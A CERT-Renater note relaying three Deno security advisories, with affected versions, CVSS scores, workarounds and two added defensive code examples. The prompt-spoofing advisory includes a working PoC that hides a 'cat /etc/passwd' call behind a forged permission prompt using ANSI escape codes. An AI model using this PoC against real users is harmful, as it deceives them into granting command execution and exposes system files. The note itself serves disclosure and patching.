===================================================================
CERT-Renater Information Note No. 2023/VULN116
_____________________________________________________________________
DATE : 28/03/2023
HARDWARE PLATFORM(S): /
OPERATING SYSTEM(S): Systems running Deno versions prior to 1.32.1, 1.31.0,
                     deno_runtime (Rust) versions prior to 0.103.0, 1.31.2,
                     serde_v8 (Rust) versions prior to 0.88.0.
===================================================================
https://github.com/denoland/deno/security/advisories/GHSA-c25x-cm9x-qqgx
https://github.com/denoland/deno/security/advisories/GHSA-vq67-rp93-65qf
https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6
_____________________________________________________________________

Improper handling of resizable ArrayBuffer in async built-in functions
Severity: Critical
Published by lucacasonato as GHSA-c25x-cm9x-qqgx

Package               Affected versions   Patched versions
Deno                  1.32.0              >= 1.32.1
deno_runtime (Rust)   0.102.0             >= 0.103.0
serde_v8 (Rust)       0.87.0              >= 0.88.0

Description

Impact
Resizable ArrayBuffers passed to asynchronous native functions and shrunk while the asynchronous operation is still in flight could result in an out-of-bounds read/write. It is unlikely that this has been exploited in the wild, as the only affected version is Deno 1.32.0. Deno Deploy users are not affected.

Patches
The problem has been resolved by temporarily disabling resizable ArrayBuffers in Deno 1.32.1. Deno 1.32.2 will re-enable resizable ArrayBuffers with a proper fix.

Workarounds
Upgrade to Deno 1.32.1, or run with --v8-flags=--no-harmony-rab-gsab to disable resizable ArrayBuffers.
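The failure mode above, shown as an added example (not Deno's code): a length-tracking view over a resizable ArrayBuffer is shrunk while a simulated asynchronous operation is still in flight, whereas a fixed-length snapshot taken before the call is unaffected. The engine keeps the JS view in bounds; a native operation holding the original pointer and length is what goes out of bounds. The names snapshotForAsyncOp, fakeAsyncOp and demo are constructed; the demo part assumes an engine with resizable ArrayBuffer support (V8 11.x, Node 20+) and reports unsupported otherwise.

```javascript
// Added example (not Deno's code): why a view over a resizable ArrayBuffer must
// not be handed to an asynchronous native operation by reference. JS engines
// keep length-tracking views in bounds, but a native op holding the original
// pointer and length would read or write past the shrunk allocation.

function isResizableBuffer(buf) {
  // `resizable` only exists on engines that implement resizable ArrayBuffers
  return buf instanceof ArrayBuffer && buf.resizable === true;
}

function snapshotForAsyncOp(view) {
  // Copy the bytes into a fresh, fixed-length ArrayBuffer that the caller
  // cannot resize; this is what a safe host would do before an async op.
  const copy = new Uint8Array(view.byteLength);
  copy.set(new Uint8Array(view.buffer, view.byteOffset, view.byteLength));
  return copy;
}

function fakeAsyncOp(view) {
  // Stand-in for an async native op: it reads its input only after the caller
  // has had a chance to run again (one macrotask later), as a real op would.
  return new Promise((resolve) =>
    setTimeout(() => resolve({ length: view.length, bytes: Array.from(view) }), 0));
}

async function demo() {
  if (typeof ArrayBuffer.prototype.resize !== "function") {
    return { supported: false };
  }
  const rab = new ArrayBuffer(8, { maxByteLength: 16 });
  const view = new Uint8Array(rab);          // length-tracking view over rab
  view.set([1, 2, 3, 4, 5, 6, 7, 8]);
  const safe = fakeAsyncOp(snapshotForAsyncOp(view));
  const unsafe = fakeAsyncOp(view);
  rab.resize(2);                             // shrink while both ops are in flight
  // safe still sees 8 bytes; unsafe sees only 2 (a native op would see garbage)
  return { supported: true, safe: await safe, unsafe: await unsafe };
}

demo().then((r) => console.log(JSON.stringify(r)));
```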
Severity: Critical, 9.9 / 10
CVSS base metrics
  Attack vector        Network
  Attack complexity    Low
  Privileges required  Low
  User interaction     None
  Scope                Changed
  Confidentiality      High
  Integrity            High
  Availability         High
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CVE ID: CVE-2023-28445
Weaknesses: CWE-125, CWE-787
Credits: @lucacasonato
_____________________________________________________________________

Interactive `run` permission prompt spoofing via improper ANSI neutralization
Severity: High
Published by bartlomieju as GHSA-vq67-rp93-65qf

Package               Affected versions   Patched versions
deno                  >= 1.8.0            1.31.2
deno_runtime (Rust)   >= 1.8.0            1.31.2

Description

Summary
Arbitrary program names without any ANSI filtering allow a malicious program to clear the first 2 lines of an op_spawn_child or op_kill prompt and replace them with any desired text.

Details
The main entry point comes down to the ability to override what the API control says (40_process.js). Because ANSI codes can clear lines, a malicious program can clear the last 2 lines of the prompt and put its own header in their place. This also works in op_kill.

PoC
This PoC works on 1.31.1, but modified versions of it work on older versions. Make a file, e.g. index.ts, that uses this vulnerability to spoof the op_spawn_child permission prompt:

const boldANSI = "\u001b[1m"    // bold
const unboldANSI = "\u001b[22m" // unbold

const prompt = `┌ ⚠️ ${boldANSI}Deno requests run access to "echo"${unboldANSI}
├ Requested by \`Deno.Command().output()`

const moveANSIUp = "\u001b[1A"       // moves the cursor up one line
const clearANSI = "\u001b[2K"        // clears the line
const moveANSIStart = "\u001b[1000D" // moves to the start of the line

Deno[Object.getOwnPropertySymbols(Deno)[0]].core.ops.op_spawn_child({
  cmd: "cat",
  args: ["/etc/passwd"],
  clearEnv: false,
  env: [],
  stdin: "null",
  stdout: "inherit",
  stderr: "piped"
}, moveANSIUp + clearANSI + moveANSIStart + prompt)

Run the file with `deno run index.ts`.
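The missing neutralization step, as an added example (not Deno's code and not its actual patch): strip terminal escape sequences and remaining control characters from the command name and the "Requested by" text before they are placed in the prompt, so the cursor-up and clear-line sequences used in the PoC above are reduced to inert text and the prompt keeps its four lines. ANSI_RE, neutralizeAnsi, renderRunPrompt and the SPOOF sample are constructed for this example.

```javascript
// Added example (not Deno's code): neutralize terminal escape sequences in
// untrusted strings before they are rendered in an interactive permission
// prompt, so a spoofed program name cannot move the cursor or clear lines.

// Recognised forms: 7-bit CSI (ESC [ ... final byte), OSC (ESC ] ... BEL or ST),
// other two-byte ESC sequences, and 8-bit CSI (U+009B ... final byte).
const ANSI_RE =
  /\u001b\[[0-?]*[ -\/]*[@-~]|\u001b\][^\u0007\u001b]*(?:\u0007|\u001b\\)|\u001b[@-Z\\-_]|\u009b[0-?]*[ -\/]*[@-~]/g;

function neutralizeAnsi(text) {
  return String(text)
    .replace(ANSI_RE, "")
    // Anything left in C0/DEL (CR, LF, BEL, a bare ESC) could still break the
    // prompt layout, so drop it rather than trying to interpret it.
    .replace(/[\u0000-\u001f\u007f]/g, "");
}

function renderRunPrompt(cmdName, requestedBy = "Deno.Command().output()") {
  // Both values may originate from the program being prompted for, so both
  // are neutralized; the layout mirrors the prompt shown in the advisory.
  const cmd = neutralizeAnsi(cmdName);
  const api = neutralizeAnsi(requestedBy);
  return [
    `┌ ⚠️ Deno requests run access to "${cmd}"`,
    `├ Requested by \`${api}\` API`,
    "├ Run again with --allow-run to bypass this prompt.",
    "└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) > ",
  ].join("\n");
}

// Constructed sample: the cursor-up / clear-line / bold sequences from the
// advisory's PoC wrapped around a fake two-line prompt header.
const SPOOF = "\u001b[1A\u001b[2K\u001b[1000D┌ ⚠️ \u001b[1mDeno requests run access to \"echo\"\u001b[22m\n├ Requested by `Deno.Command().output()`";

console.log(renderRunPrompt("cat", SPOOF));
```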
Impact
Any Deno program is able to spoof the interactive permission prompt for the op_spawn_child or the op_kill action (which indirectly gives access to all run commands) by overriding the "Requested by {message}" API text with its own ANSI codes, allowing it to clear the latter prompt and change it to whatever it needs:

// Expected Prompt
┌ ⚠️ Deno requests run access to "cat"
├ Requested by `Deno.Command().output()` API
├ Run again with --allow-run to bypass this prompt.
└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) >

// Actual Prompt
┌ ⚠️ Deno requests run access to "echo"
├ Requested by `Deno.Command().output()` API
├ Run again with --allow-run to bypass this prompt.
└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) >

This works with any command on the respective platform, giving the program full control over which program it runs. This problem cannot be exploited on systems that do not attach an interactive prompt (for example headless servers). Before v1.31.0, this requires the --unstable flag.

Severity: High, 8.8 / 10
CVSS base metrics
  Attack vector        Network
  Attack complexity    Low
  Privileges required  None
  User interaction     Required
  Scope                Unchanged
  Confidentiality      High
  Integrity            High
  Availability         High
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVE ID: CVE-2023-28446
Weaknesses: CWE-150
Credits: @LeoDog896
_____________________________________________________________________

Regular Expression Denial of Service in Deno.upgradeWebSocket API
Severity: Moderate
Published by bartlomieju as GHSA-jc97-h3h9-7xh6

Package   Affected versions   Patched versions
Deno      1.12.0              1.31.0

Description

Impact
A specially crafted "Connection"/"Upgrade" header could have been used to significantly slow down WebSocket servers that use the Deno.upgradeWebSocket() API.

Patches
It is recommended that users upgrade to Deno 1.31.0.

Severity: Moderate, 5.3 / 10
CVSS base metrics
  Attack vector        Network
  Attack complexity    Low
  Privileges required  None
  User interaction     None
  Scope                Unchanged
  Confidentiality      None
  Integrity            None
  Availability         Low
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
CVE ID: CVE-2023-26103
Weaknesses: CWE-1333
Credits: @dellalibera
========================================================
+ CERT-RENATER        | tel   : 01-53-94-20-44           +
+ 23/25 Rue Daviel    | fax   : 01-53-94-20-41           +
+ 75013 Paris         | email : cert@support.renater.fr  +
========================================================